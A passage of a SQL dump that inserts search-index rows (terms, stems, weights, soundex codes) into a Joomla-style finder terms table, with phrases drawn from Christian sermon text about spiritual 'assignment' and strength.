(296827, 'the two a', 'the two a', 0, 1, 1.3, 'T000', 1, '*'),
(296828, 'they are in', 'thei are in', 0, 1, 1.3667, 'T650', 1, '*'),
(296829, 'they are rather', 'thei are rather', 0, 1, 1.5, 'T636', 1, '*'),
(296830, 'this because god', 'thi because god', 0, 1, 1.5333, 'T2123', 1, '*'),
(296831, 'till when', 'till when', 0, 1, 1.3, 'T450', 1, '*'),
(296832, 'till when god', 'till when god', 0, 1, 1.4333, 'T4523', 1, '*'),
(296833, 'title if', 'titl if', 0, 1, 1.2667, 'T410', 1, '*'),
(296834, 'title if your', 'titl if your', 0, 1, 1.4333, 'T416', 1, '*'),
(296835, 'title you', 'titl you', 0, 1, 1.3, 'T400', 1, '*'),
(296836, 'title you carry', 'titl you carry', 0, 1, 1.5, 'T426', 1, '*'),
(296837, 'titles he', 'titl he', 0, 1, 1.3, 'T420', 1, '*'),
(296838, 'titles he gives', 'titl he gives', 0, 1, 1.5, 'T4212', 1, '*'),
(296839, 'to assignment', 'to assignment', 0, 1, 1.4333, 'T253', 2, '*'),
(296840, 'to assignment and', 'to assignment and', 0, 1, 1.5667, 'T25353', 1, '*'),
(296841, 'to be added', 'to be added', 0, 1, 1.3667, 'T130', 1, '*'),
(296842, 'to change your', 'to change your', 0, 1, 1.4667, 'T2526', 1, '*'),
(296843, 'to clean', 'to clean', 0, 1, 1.2667, 'T245', 1, '*'),
(296844, 'to clean the', 'to clean the', 0, 1, 1.4, 'T2453', 1, '*'),
(296845, 'to it', 'to it', 0, 1, 1.1667, 'T000', 1, '*'),
(296846, 'to it go', 'to it go', 0, 1, 1.2667, 'T200', 1, '*'),
(296847, 'to know you', 'to know you', 0, 1, 1.3667, 'T250', 1, '*'),
(296848, 'to promote', 'to promote', 0, 1, 1.3333, 'T1653', 1, '*'),
(296849, 'to promote a', 'to promote a', 0, 1, 1.4, 'T1653', 1, '*'),
(296850, 'to take your', 'to take your', 0, 1, 1.4, 'T260', 1, '*'),
(296851, 'to your assignment', 'to your assignment', 0, 1, 1.6, 'T6253', 1, '*'),
(296852, 'to your spirit', 'to your spirit', 0, 1, 1.4667, 'T62163', 1, '*'),
(296853, 'today on', 'todai on', 0, 1, 1.2667, 'T500', 1, '*'),
(296854, 'today on some', 'todai on some', 0, 1, 1.4333, 'T525', 1, '*'),
(296855, 'too well', 'too well', 0, 1, 1.2667, 'T400', 1, '*'),
(296856, 'too well assignment', 'too well assignment', 0, 1, 1.6333, 'T4253', 1, '*'),
(296857, 'took assignment', 'took assignment', 0, 1, 1.5, 'T253', 1, '*'),
(296858, 'took assignment serious', 'took assignment serious', 0, 1, 1.7667, 'T253262', 1, '*'),
(296859, 'truths about', 'truth about', 0, 1, 1.4, 'T63213', 1, '*'),
(296860, 'truths about assignment', 'truth about assignment', 0, 1, 1.7667, 'T63213253', 1, '*'),
(296861, 'two a', 'two a', 0, 1, 1.1667, 'T000', 1, '*'),
(296862, 'two a man', 'two a man', 0, 1, 1.3, 'T500', 1, '*'),
(296863, 'two kinds', 'two kinds', 0, 1, 1.3, 'T2532', 1, '*'),
(296864, 'two kinds of', 'two kinds of', 0, 1, 1.4, 'T25321', 1, '*'),
(296865, 'up and damaged', 'up and damaged', 0, 1, 1.4667, 'U153523', 1, '*'),
(296866, 'up goliath\'s', 'up goliath', 0, 1, 1.4, 'U12432', 1, '*'),
(296867, 'up goliath\'s battle', 'up goliath battle', 0, 1, 1.6333, 'U12432134', 1, '*'),
(296868, 'up in what', 'up in what', 0, 1, 1.3333, 'U153', 1, '*'),
(296869, 'us i', 'us i', 0, 1, 1.1333, 'U200', 1, '*'),
(296870, 'us i am', 'us i am', 0, 1, 1.2333, 'U250', 1, '*'),
(296871, 'us till', 'us till', 0, 1, 1.2333, 'U234', 1, '*'),
(296872, 'us till when', 'us till when', 0, 1, 1.4, 'U2345', 1, '*'),
(296873, 'victory you', 'victori you', 0, 1, 1.3667, 'V236', 1, '*'),
(296874, 'victory you should', 'victori you should', 0, 1, 1.6, 'V236243', 1, '*'),
(296875, 'wants to change', 'want to change', 0, 1, 1.5, 'W5323252', 1, '*'),
(296876, 'wants to promote', 'want to promote', 0, 1, 1.5333, 'W53231653', 1, '*'),
(296877, 'was his safety', 'wa his safety', 0, 1, 1.4667, 'W213', 1, '*'),
(296878, 'was serious', 'wa serious', 0, 1, 1.3667, 'W262', 1, '*'),
(296879, 'was serious with', 'wa serious with', 0, 1, 1.5333, 'W2623', 1, '*'),
(296880, 'we fight', 'we fight', 0, 1, 1.2667, 'W123', 1, '*'),
(296881, 'we fight battles', 'we fight battles', 0, 1, 1.5333, 'W1231342', 1, '*'),
(296882, 'well assignment', 'well assignment', 0, 1, 1.5, 'W4253', 1, '*'),
(296883, 'well assignment is', 'well assignment is', 0, 1, 1.6, 'W42532', 1, '*'),
(296884, 'well it', 'well it', 0, 1, 1.2333, 'W430', 1, '*'),
(296885, 'well it is', 'well it is', 0, 1, 1.3333, 'W432', 1, '*'),
(296886, 'well spiritually', 'well spiritually', 0, 1, 1.5333, 'W421634', 1, '*'),
(296887, 'well spiritually isassignment', 'well spiritually isassignment', 0, 1, 1.9667, 'W421634253', 1, '*'),
(296888, 'what determines if', 'what determines if', 0, 1, 1.6, 'W36521', 1, '*'),
(296889, 'what determines your', 'what determines your', 0, 1, 1.6667, 'W36526', 1, '*'),
(296890, 'what develops', 'what develops', 0, 1, 1.4333, 'W31412', 1, '*'),
(296891, 'what develops your', 'what develops your', 0, 1, 1.6, 'W314126', 1, '*'),
(296892, 'what gets', 'what gets', 0, 1, 1.3, 'W3232', 1, '*'),
(296893, 'what gets you', 'what gets you', 0, 1, 1.4333, 'W3232', 1, '*'),
(296894, 'what prepares', 'what prepares', 0, 1, 1.4333, 'W316162', 1, '*'),
(296895, 'what prepares us', 'what prepares us', 0, 1, 1.5333, 'W316162', 1, '*'),
(296896, 'what prepares you', 'what prepares you', 0, 1, 1.5667, 'W316162', 1, '*'),
(296897, 'what state', 'what state', 0, 1, 1.3333, 'W323', 1, '*'),
(296898, 'what state will', 'what state will', 0, 1, 1.5, 'W3234', 1, '*'),
(296899, 'when god comes', 'when god comes', 0, 1, 1.4667, 'W523252', 1, '*'),
(296900, 'when god wants', 'when god wants', 0, 1, 1.4667, 'W523532', 1, '*'),
(296901, 'when he decided', 'when he decided', 0, 1, 1.5, 'W5323', 1, '*'),
(296902, 'when your', 'when your', 0, 1, 1.3, 'W560', 2, '*'),
(296903, 'when your promotion', 'when your promotion', 0, 1, 1.6333, 'W5616535', 1, '*'),
(296904, 'who is not', 'who is not', 0, 1, 1.3333, 'W253', 1, '*'),
(296905, 'will be enthronement', 'will be enthronement', 0, 1, 1.6667, 'W4153653', 1, '*'),
(296906, 'will be manifestations', 'will be manifestations', 0, 1, 1.7333, 'W41512352', 1, '*'),
(296907, 'will be withdrawn', 'will be withdrawn', 0, 1, 1.5667, 'W41365', 1, '*'),
(296908, 'will either', 'will either', 0, 1, 1.3667, 'W436', 1, '*'),
(296909, 'will either create', 'will either create', 0, 1, 1.6, 'W436263', 1, '*'),
(296910, 'will it', 'will it', 0, 1, 1.2333, 'W430', 1, '*'),
(296911, 'will it meet', 'will it meet', 0, 1, 1.4, 'W4353', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(296912, 'will make all', 'will make all', 0, 1, 1.4333, 'W4524', 1, '*'),
(296913, 'will withdraw', 'will withdraw', 0, 1, 1.4333, 'W436', 1, '*'),
(296914, 'will withdraw the', 'will withdraw the', 0, 1, 1.5667, 'W4363', 1, '*'),
(296915, 'with assignment', 'with assignment', 0, 1, 1.5, 'W3253', 1, '*'),
(296916, 'with assignment delilah', 'with assignment delilah', 0, 1, 1.7667, 'W32534', 1, '*'),
(296917, 'with assignment is', 'with assignment is', 0, 1, 1.6, 'W32532', 1, '*'),
(296918, 'with assignment when', 'with assignment when', 0, 1, 1.6667, 'W32535', 1, '*'),
(296919, 'with the assignment', 'with the assignment', 0, 1, 1.6333, 'W3253', 1, '*'),
(296920, 'with you today', 'with you today', 0, 1, 1.4667, 'W300', 1, '*'),
(296921, 'with your assignment', 'with your assignment', 0, 1, 1.6667, 'W36253', 1, '*'),
(296922, 'withdraw the', 'withdraw the', 0, 1, 1.4, 'W363', 1, '*'),
(296923, 'withdraw the ministry', 'withdraw the ministry', 0, 1, 1.7, 'W3635236', 1, '*'),
(296924, 'withdrawn from you', 'withdrawn from you', 0, 1, 1.6, 'W365165', 1, '*'),
(296925, 'withdrawn stop', 'withdrawn stop', 0, 1, 1.4667, 'W365231', 1, '*'),
(296926, 'withdrawn stop looking', 'withdrawn stop looking', 0, 1, 1.7333, 'W3652314252', 1, '*'),
(296927, 'without assignment', 'without assignment', 0, 1, 1.6, 'W3253', 1, '*'),
(296928, 'without assignment such', 'without assignment such', 0, 1, 1.7667, 'W32532', 1, '*'),
(296929, 'women that', 'women that', 0, 1, 1.3333, 'W530', 1, '*'),
(296930, 'women that your', 'women that your', 0, 1, 1.5, 'W536', 1, '*'),
(296931, 'you are being', 'you are being', 0, 1, 1.4333, 'Y6152', 1, '*'),
(296932, 'you are given', 'you are given', 0, 1, 1.4333, 'Y6215', 1, '*'),
(296933, 'you are pregnant', 'you are pregnant', 0, 1, 1.5333, 'Y616253', 1, '*'),
(296934, 'you assignments', 'you assignments', 0, 1, 1.5, 'Y2532', 1, '*'),
(296935, 'you assignments in', 'you assignments in', 0, 1, 1.6, 'Y25325', 1, '*'),
(296936, 'you carry it', 'you carry it', 0, 1, 1.4, 'Y263', 1, '*'),
(296937, 'you do with', 'you do with', 0, 1, 1.3667, 'Y300', 1, '*'),
(296938, 'you fail', 'you fail', 0, 1, 1.2667, 'Y140', 1, '*'),
(296939, 'you fail in', 'you fail in', 0, 1, 1.3667, 'Y145', 1, '*'),
(296940, 'you for the', 'you for the', 0, 1, 1.3667, 'Y163', 1, '*'),
(296941, 'you give yourself', 'you give yourself', 0, 1, 1.5667, 'Y216241', 1, '*'),
(296942, 'you god', 'you god', 0, 1, 1.2333, 'Y230', 3, '*'),
(296943, 'you god doesn\'t', 'you god doesn', 0, 1, 1.5, 'Y23253', 1, '*'),
(296944, 'you have passed', 'you have passed', 0, 1, 1.5, 'Y123', 1, '*'),
(296945, 'you it shows', 'you it shows', 0, 1, 1.4, 'Y320', 1, '*'),
(296946, 'you know you', 'you know you', 0, 1, 1.4, 'Y250', 1, '*'),
(296947, 'you must apply', 'you must apply', 0, 1, 1.4667, 'Y52314', 1, '*'),
(296948, 'you must never', 'you must never', 0, 1, 1.4667, 'Y523516', 1, '*'),
(296949, 'you not title', 'you not title', 0, 1, 1.4333, 'Y534', 1, '*'),
(296950, 'you promote', 'you promote', 0, 1, 1.3667, 'Y1653', 1, '*'),
(296951, 'you promote a', 'you promote a', 0, 1, 1.4333, 'Y1653', 1, '*'),
(296952, 'you today', 'you today', 0, 1, 1.3, 'Y300', 3, '*'),
(296953, 'you today on', 'you today on', 0, 1, 1.4, 'Y350', 1, '*'),
(296954, 'you women', 'you women', 0, 1, 1.3, 'Y500', 1, '*'),
(296955, 'you women that', 'you women that', 0, 1, 1.4667, 'Y530', 1, '*'),
(296956, 'you your', 'you your', 0, 1, 1.2667, 'Y600', 2, '*'),
(296957, 'you your future', 'you your future', 0, 1, 1.5, 'Y6136', 1, '*'),
(296958, 'your assignment', 'your assignment', 0, 1, 1.5, 'Y6253', 3, '*'),
(296959, 'your assignment don\'t', 'your assignment don', 0, 1, 1.7, 'Y625353', 1, '*'),
(296960, 'your assignment is', 'your assignment is', 0, 1, 1.6, 'Y62532', 1, '*'),
(296961, 'your assignment serious', 'your assignment serious', 0, 1, 1.7667, 'Y6253262', 1, '*'),
(296962, 'your assignment will', 'your assignment will', 0, 1, 1.6667, 'Y62534', 1, '*'),
(296963, 'your best to', 'your best to', 0, 1, 1.4, 'Y6123', 1, '*'),
(296964, 'your deliveries', 'your deliveries', 0, 1, 1.5, 'Y634162', 1, '*'),
(296965, 'your deliveries will', 'your deliveries will', 0, 1, 1.6667, 'Y6341624', 1, '*'),
(296966, 'your future it', 'your future it', 0, 1, 1.4667, 'Y61363', 1, '*'),
(296967, 'your future when', 'your future when', 0, 1, 1.5333, 'Y61365', 1, '*'),
(296968, 'your journey', 'your journey', 0, 1, 1.4, 'Y6265', 2, '*'),
(296969, 'your journey as', 'your journey as', 0, 1, 1.5, 'Y62652', 1, '*'),
(296970, 'your level', 'your level', 0, 1, 1.3333, 'Y6414', 1, '*'),
(296971, 'your level he', 'your level he', 0, 1, 1.4333, 'Y6414', 1, '*'),
(296972, 'your life i', 'your life i', 0, 1, 1.3667, 'Y641', 1, '*'),
(296973, 'your ministry', 'your ministry', 0, 1, 1.4333, 'Y65236', 1, '*'),
(296974, 'your ministry will', 'your ministry will', 0, 1, 1.6, 'Y652364', 1, '*'),
(296975, 'your personal battles', 'your personal battles', 0, 1, 1.7, 'Y6162541342', 1, '*'),
(296976, 'your potential', 'your potential', 0, 1, 1.4667, 'Y613534', 1, '*'),
(296977, 'your potential in', 'your potential in', 0, 1, 1.5667, 'Y6135345', 1, '*'),
(296978, 'your promotion', 'your promotion', 0, 1, 1.4667, 'Y616535', 1, '*'),
(296979, 'your promotion battle', 'your promotion battle', 0, 1, 1.7, 'Y616535134', 1, '*'),
(296980, 'your spirit what', 'your spirit what', 0, 1, 1.5333, 'Y62163', 1, '*'),
(296981, 'yourself to your', 'yourself to your', 0, 1, 1.5333, 'Y624136', 1, '*'),
(296982, 'zion serious', 'zion serious', 0, 1, 1.4, 'Z5262', 1, '*'),
(296983, 'zion serious assignment', 'zion serious assignment', 0, 1, 1.7667, 'Z526253', 1, '*'),
(296984, 'zion you', 'zion you', 0, 1, 1.2667, 'Z500', 1, '*'),
(296985, 'zion you must', 'zion you must', 0, 1, 1.4333, 'Z523', 1, '*'),
(297263, '\'it', 'it', 0, 0, 0.2, 'I300', 1, '*'),
(297264, '\'it is', 'it is', 0, 1, 1.2, 'I320', 1, '*'),
(297265, '\'it is written', 'it is written', 0, 1, 1.4667, 'I32635', 1, '*'),
(297266, '1 give', '1 give', 0, 1, 1.2, 'G100', 1, '*'),
(297267, '1 give it', '1 give it', 0, 1, 1.3, 'G130', 1, '*'),
(297268, '12 23b', '12 23b', 0, 1, 1.2, 'B000', 1, '*'),
(297269, '12 23b these', '12 23b these', 0, 1, 1.4, 'B320', 1, '*'),
(297270, '14 14', '14 14', 0, 1, 1.1667, '', 1, '*'),
(297271, '14 14 the', '14 14 the', 0, 1, 1.3, 'T000', 1, '*'),
(297272, '14 the spirit', '14 the spirit', 0, 1, 1.4333, 'T2163', 1, '*'),
(297273, '14 your', '14 your', 0, 1, 1.2333, 'Y600', 1, '*'),
(297274, '14 your spirit', '14 your spirit', 0, 1, 1.4667, 'Y62163', 1, '*'),
(297275, '18 14', '18 14', 0, 1, 1.1667, '', 1, '*'),
(297276, '18 14 14', '18 14 14', 0, 1, 1.2667, '', 1, '*'),
(297277, '18 14 your', '18 14 your', 0, 1, 1.3333, 'Y600', 1, '*'),
(297278, '2 feed', '2 feed', 0, 1, 1.2, 'F300', 2, '*'),
(297279, '2 feed your', '2 feed your', 0, 1, 1.3667, 'F360', 1, '*'),
(297280, '20 03', '20 03', 0, 1, 1.1667, '', 1, '*'),
(297281, '20 03 2017', '20 03 2017', 0, 1, 1.3333, '', 1, '*'),
(297282, '20 says', '20 says', 0, 1, 1.2333, 'S000', 1, '*'),
(297283, '20 says “but', '20 says “but', 0, 1, 1.4, 'S130', 1, '*'),
(297284, '23b', '23b', 0, 0, 0.2, 'B000', 1, '*'),
(297285, '23b these', '23b these', 0, 1, 1.3, 'B320', 1, '*'),
(297286, '23b these fellowships', '23b these fellowships', 0, 1, 1.7, 'B3214212', 1, '*'),
(297287, '3 exercise', '3 exercise', 0, 1, 1.3333, 'E262', 1, '*'),
(297288, '3 exercise your', '3 exercise your', 0, 1, 1.5, 'E2626', 1, '*'),
(297289, '3 parts', '3 parts', 0, 1, 1.2333, 'P632', 1, '*'),
(297290, '3 parts spirit', '3 parts spirit', 0, 1, 1.4667, 'P632163', 1, '*'),
(297291, '33 from', '33 from', 0, 1, 1.2333, 'F650', 1, '*'),
(297292, '33 from our', '33 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(297293, '4 4', '4 4', 0, 1, 1.1, '', 1, '*'),
(297294, '4 4 says', '4 4 says', 0, 1, 1.2667, 'S000', 1, '*'),
(297295, '4 says “but', '4 says “but', 0, 1, 1.3667, 'S130', 1, '*'),
(297296, '4 worship', '4 worship', 0, 1, 1.3, 'W621', 1, '*'),
(297297, '4 worship spending', '4 worship spending', 0, 1, 1.6, 'W621215352', 1, '*'),
(297298, '5 protect', '5 protect', 0, 1, 1.3, 'P6323', 1, '*'),
(297299, '5 protect your', '5 protect your', 0, 1, 1.4667, 'P63236', 1, '*'),
(297300, '6 meditate', '6 meditate', 0, 1, 1.3333, 'M300', 1, '*'),
(297301, '6 meditate on', '6 meditate on', 0, 1, 1.4333, 'M350', 1, '*'),
(297302, 'a body and', 'a body and', 0, 1, 1.3333, 'A1353', 1, '*'),
(297303, 'a body therefore', 'a body therefore', 0, 1, 1.5333, 'A13616', 1, '*'),
(297304, 'a body your', 'a body your', 0, 1, 1.3667, 'A136', 1, '*'),
(297305, 'a broken', 'a broken', 0, 1, 1.2667, 'A1625', 1, '*'),
(297306, 'a broken spirit', 'a broken spirit', 0, 1, 1.5, 'A16252163', 1, '*'),
(297307, 'a joseph', 'a joseph', 0, 1, 1.2667, 'A210', 1, '*'),
(297308, 'a joseph because', 'a joseph because', 0, 1, 1.5333, 'A212', 1, '*'),
(297309, 'a joseph will', 'a joseph will', 0, 1, 1.4333, 'A214', 1, '*'),
(297310, 'a joseph you', 'a joseph you', 0, 1, 1.4, 'A210', 1, '*'),
(297311, 'a man will', 'a man will', 0, 1, 1.3333, 'A540', 1, '*'),
(297312, 'a need', 'a need', 0, 1, 1.2, 'A530', 1, '*'),
(297313, 'a need to', 'a need to', 0, 1, 1.3, 'A530', 1, '*'),
(297314, 'a soul', 'a soul', 0, 1, 1.2, 'A240', 1, '*'),
(297315, 'a soul and', 'a soul and', 0, 1, 1.3333, 'A2453', 1, '*'),
(297316, 'a spirit that', 'a spirit that', 0, 1, 1.4333, 'A2163', 1, '*'),
(297317, 'a spirit who', 'a spirit who', 0, 1, 1.4, 'A2163', 1, '*'),
(297318, 'a strong spirit', 'a strong spirit', 0, 1, 1.5, 'A23652163', 1, '*'),
(297319, 'a stronger', 'a stronger', 0, 1, 1.3333, 'A236526', 1, '*'),
(297320, 'a stronger spirit', 'a stronger spirit', 0, 1, 1.5667, 'A2365262163', 1, '*'),
(297321, 'a template', 'a template', 0, 1, 1.3333, 'A35143', 1, '*'),
(297322, 'a template to', 'a template to', 0, 1, 1.4333, 'A35143', 1, '*'),
(297323, 'a tripartite', 'a tripartite', 0, 1, 1.4, 'A36163', 1, '*'),
(297324, 'a tripartite nature', 'a tripartite nature', 0, 1, 1.6333, 'A36163536', 1, '*'),
(297325, 'a very precious', 'a very precious', 0, 1, 1.5, 'A16162', 1, '*'),
(297326, 'a weak', 'a weak', 0, 1, 1.2, 'A200', 1, '*'),
(297327, 'a weak spirit', 'a weak spirit', 0, 1, 1.4333, 'A2163', 1, '*'),
(297328, 'a well-nourished', 'a well-nourished', 0, 1, 1.5333, 'A45623', 1, '*'),
(297329, 'a well-nourished strong', 'a well-nourished strong', 0, 1, 1.7667, 'A4562323652', 1, '*'),
(297330, 'able to go', 'abl to go', 0, 1, 1.3333, 'A1432', 1, '*'),
(297331, 'able to lead', 'abl to lead', 0, 1, 1.4, 'A14343', 1, '*'),
(297332, 'afford to fellowship', 'afford to fellowship', 0, 1, 1.6667, 'A1631421', 1, '*'),
(297333, 'afford to neglect', 'afford to neglect', 0, 1, 1.5667, 'A16352423', 1, '*'),
(297334, 'alive you', 'aliv you', 0, 1, 1.3, 'A410', 1, '*'),
(297335, 'alive you stop', 'aliv you stop', 0, 1, 1.4667, 'A41231', 1, '*'),
(297336, 'all other', 'all other', 0, 1, 1.3, 'A436', 1, '*'),
(297337, 'all other areas', 'all other areas', 0, 1, 1.5, 'A4362', 1, '*'),
(297338, 'all other aspects', 'all other aspects', 0, 1, 1.5667, 'A43621232', 1, '*'),
(297339, 'all spirits', 'all spirits', 0, 1, 1.3667, 'A421632', 1, '*'),
(297340, 'all spirits god', 'all spirits god', 0, 1, 1.5, 'A4216323', 1, '*'),
(297341, 'all till', 'all till', 0, 1, 1.2667, 'A434', 1, '*'),
(297342, 'all till he', 'all till he', 0, 1, 1.3667, 'A434', 1, '*'),
(297343, 'almost always explain', 'almost always explain', 0, 1, 1.7, 'A452342145', 1, '*'),
(297344, 'alone but', 'alon but', 0, 1, 1.3, 'A4513', 1, '*'),
(297345, 'alone but by', 'alon but by', 0, 1, 1.4, 'A45131', 1, '*'),
(297346, 'always explain', 'alwai explain', 0, 1, 1.4667, 'A42145', 1, '*'),
(297347, 'always explain every', 'alwai explain every', 0, 1, 1.6667, 'A4214516', 1, '*'),
(297348, 'always miss', 'alwai miss', 0, 1, 1.3667, 'A4252', 1, '*'),
(297349, 'always miss god', 'alwai miss god', 0, 1, 1.5, 'A42523', 1, '*'),
(297350, 'an edifice', 'an edifice', 0, 1, 1.3333, 'A5312', 1, '*'),
(297351, 'an edifice 4', 'an edifice 4', 0, 1, 1.4, 'A5312', 1, '*'),
(297352, 'and body', 'and body', 0, 1, 1.2667, 'A5313', 1, '*'),
(297353, 'and body but', 'and body but', 0, 1, 1.4, 'A531313', 1, '*'),
(297354, 'and body the', 'and body the', 0, 1, 1.4, 'A5313', 1, '*'),
(297355, 'and can almost', 'and can almost', 0, 1, 1.4667, 'A53254523', 1, '*'),
(297356, 'and crown', 'and crown', 0, 1, 1.3, 'A53265', 1, '*'),
(297357, 'and crown were', 'and crown were', 0, 1, 1.4667, 'A532656', 1, '*'),
(297358, 'and dominion', 'and dominion', 0, 1, 1.4, 'A535', 1, '*'),
(297359, 'and dominion only', 'and dominion only', 0, 1, 1.5667, 'A5354', 1, '*'),
(297360, 'and emotions', 'and emotions', 0, 1, 1.4, 'A535352', 1, '*'),
(297361, 'and emotions these', 'and emotions these', 0, 1, 1.6, 'A53535232', 1, '*'),
(297362, 'and every', 'and every', 0, 1, 1.3, 'A5316', 2, '*'),
(297363, 'and every christian', 'and every christian', 0, 1, 1.6333, 'A531626235', 1, '*'),
(297364, 'and foolish', 'and foolish', 0, 1, 1.3667, 'A53142', 1, '*'),
(297365, 'and foolish things', 'and foolish things', 0, 1, 1.6, 'A53142352', 1, '*'),
(297366, 'and head', 'and head', 0, 1, 1.2667, 'A530', 1, '*'),
(297367, 'and head respectively', 'and head respectively', 0, 1, 1.7, 'A536212314', 1, '*'),
(297368, 'and lead', 'and lead', 0, 1, 1.2667, 'A5343', 1, '*'),
(297369, 'and lead you', 'and lead you', 0, 1, 1.4, 'A5343', 1, '*'),
(297370, 'and lives', 'and lives', 0, 1, 1.3, 'A53412', 1, '*'),
(297371, 'and lives in', 'and lives in', 0, 1, 1.4, 'A534125', 1, '*'),
(297372, 'and make it', 'and make it', 0, 1, 1.3667, 'A53523', 1, '*'),
(297373, 'and more', 'and more', 0, 1, 1.2667, 'A5356', 1, '*'),
(297374, 'and more influential', 'and more influential', 0, 1, 1.6667, 'A5356514534', 1, '*'),
(297375, 'and perversions', 'and perversions', 0, 1, 1.5, 'A531616252', 1, '*'),
(297376, 'and perversions 6', 'and perversions 6', 0, 1, 1.5667, 'A531616252', 1, '*'),
(297377, 'and reduce', 'and reduce', 0, 1, 1.3333, 'A53632', 1, '*'),
(297378, 'and reduce your', 'and reduce your', 0, 1, 1.5, 'A536326', 1, '*'),
(297379, 'and sacred', 'and sacred', 0, 1, 1.3333, 'A53263', 1, '*'),
(297380, 'and sacred time', 'and sacred time', 0, 1, 1.5, 'A532635', 1, '*'),
(297381, 'and said \'it', 'and said it', 0, 1, 1.4, 'A5323', 1, '*'),
(297382, 'and soul', 'and soul', 0, 1, 1.2667, 'A5324', 2, '*'),
(297383, 'and soul effectively', 'and soul effectively', 0, 1, 1.6667, 'A532412314', 1, '*'),
(297384, 'and stamina', 'and stamina', 0, 1, 1.3667, 'A53235', 1, '*'),
(297385, 'and stamina are', 'and stamina are', 0, 1, 1.5, 'A532356', 1, '*'),
(297386, 'and the ring', 'and the ring', 0, 1, 1.4, 'A53652', 1, '*'),
(297387, 'and the strength', 'and the strength', 0, 1, 1.5333, 'A53236523', 1, '*'),
(297388, 'and then you', 'and then you', 0, 1, 1.4, 'A535', 2, '*'),
(297389, 'and your body', 'and your body', 0, 1, 1.4333, 'A53613', 1, '*'),
(297390, 'and your soul', 'and your soul', 0, 1, 1.4333, 'A53624', 1, '*'),
(297391, 'and your spirit', 'and your spirit', 0, 1, 1.5, 'A5362163', 1, '*'),
(297392, 'answered and', 'answer and', 0, 1, 1.4, 'A526353', 1, '*'),
(297393, 'answered and said', 'answer and said', 0, 1, 1.5667, 'A52635323', 1, '*'),
(297394, 'are a spirit', 'ar a spirit', 0, 1, 1.4, 'A62163', 1, '*'),
(297395, 'are highly', 'ar highly', 0, 1, 1.3333, 'A624', 1, '*'),
(297396, 'are highly cerebral', 'ar highly cerebral', 0, 1, 1.6333, 'A62426164', 1, '*'),
(297397, 'are just emotional', 'ar just emotional', 0, 1, 1.6, 'A6235354', 1, '*'),
(297398, 'are more emotionally', 'ar more emotionally', 0, 1, 1.6667, 'A6565354', 1, '*'),
(297399, 'are more than', 'ar more than', 0, 1, 1.4333, 'A65635', 1, '*'),
(297400, 'are soulish', 'ar soulish', 0, 1, 1.3667, 'A6242', 1, '*'),
(297401, 'are soulish people', 'ar soulish people', 0, 1, 1.6, 'A624214', 1, '*'),
(297402, 'are ways', 'ar ways', 0, 1, 1.2667, 'A620', 1, '*'),
(297403, 'are ways to', 'ar ways to', 0, 1, 1.3667, 'A623', 1, '*'),
(297404, 'are what determine', 'ar what determine', 0, 1, 1.6, 'A6365', 1, '*'),
(297405, 'areas', 'area', 0, 0, 0.3333, 'A620', 1, '*'),
(297406, 'areas of', 'area of', 0, 1, 1.2667, 'A621', 1, '*'),
(297407, 'areas of your', 'area of your', 0, 1, 1.4333, 'A6216', 1, '*'),
(297408, 'as a joseph', 'as a joseph', 0, 1, 1.3667, 'A210', 1, '*'),
(297409, 'as merely', 'as merely', 0, 1, 1.3, 'A2564', 1, '*'),
(297410, 'as merely physical', 'as merely physical', 0, 1, 1.6, 'A2564124', 1, '*'),
(297411, 'aspects', 'aspect', 0, 0, 0.4667, 'A21232', 1, '*'),
(297412, 'aspects of', 'aspect of', 0, 1, 1.3333, 'A212321', 1, '*'),
(297413, 'aspects of your', 'aspect of your', 0, 1, 1.5, 'A2123216', 1, '*'),
(297414, 'authority and', 'author and', 0, 1, 1.4333, 'A36353', 1, '*'),
(297415, 'authority and dominion', 'author and dominion', 0, 1, 1.7333, 'A363535', 1, '*'),
(297416, 'awakens', 'awaken', 0, 0, 0.4667, 'A252', 1, '*'),
(297417, 'awakens and', 'awaken and', 0, 1, 1.3667, 'A25253', 1, '*'),
(297418, 'awakens and then', 'awaken and then', 0, 1, 1.5333, 'A252535', 1, '*'),
(297419, 'away as', 'awai as', 0, 1, 1.2333, 'A200', 1, '*'),
(297420, 'away as merely', 'awai as merely', 0, 1, 1.4667, 'A2564', 1, '*'),
(297421, 'based than', 'base than', 0, 1, 1.3333, 'B235', 1, '*'),
(297422, 'based than spiritual', 'base than spiritual', 0, 1, 1.6667, 'B23521634', 1, '*'),
(297423, 'be a very', 'be a very', 0, 1, 1.3, 'B600', 1, '*'),
(297424, 'be as a', 'be as a', 0, 1, 1.2333, 'B200', 1, '*'),
(297425, 'be constantly', 'be constantly', 0, 1, 1.4333, 'B2523534', 1, '*'),
(297426, 'be constantly opened', 'be constantly opened', 0, 1, 1.6667, 'B2523534153', 1, '*'),
(297427, 'be strengthened', 'be strengthened', 0, 1, 1.5, 'B23652353', 1, '*'),
(297428, 'be strengthened inyour', 'be strengthened inyour', 0, 1, 1.7333, 'B2365235356', 1, '*'),
(297429, 'be strong', 'be strong', 0, 1, 1.3, 'B23652', 1, '*'),
(297430, 'be strong in', 'be strong in', 0, 1, 1.4, 'B236525', 1, '*'),
(297431, 'be stronger', 'be stronger', 0, 1, 1.3667, 'B236526', 1, '*'),
(297432, 'be stronger than', 'be stronger than', 0, 1, 1.5333, 'B23652635', 1, '*'),
(297433, 'bear a', 'bear a', 0, 1, 1.2, 'B600', 1, '*'),
(297434, 'bear a broken', 'bear a broken', 0, 1, 1.4333, 'B61625', 1, '*'),
(297435, 'because god is', 'becaus god is', 0, 1, 1.4667, 'B232', 1, '*'),
(297436, 'because these', 'becaus these', 0, 1, 1.4333, 'B232', 1, '*'),
(297437, 'because these will', 'becaus these will', 0, 1, 1.6, 'B2324', 1, '*'),
(297438, 'being has', 'be has', 0, 1, 1.3, 'B520', 1, '*'),
(297439, 'being has 3', 'be has 3', 0, 1, 1.3667, 'B520', 1, '*'),
(297440, 'being just', 'be just', 0, 1, 1.3333, 'B523', 1, '*'),
(297441, 'being just a', 'be just a', 0, 1, 1.4, 'B523', 1, '*'),
(297442, 'believers always', 'believ always', 0, 1, 1.5333, 'B416242', 1, '*'),
(297443, 'believers always miss', 'believ always miss', 0, 1, 1.7, 'B41624252', 1, '*'),
(297444, 'believers are highly', 'believ are highly', 0, 1, 1.6667, 'B4162624', 1, '*'),
(297445, 'beloved build', 'belov build', 0, 1, 1.4333, 'B413143', 1, '*'),
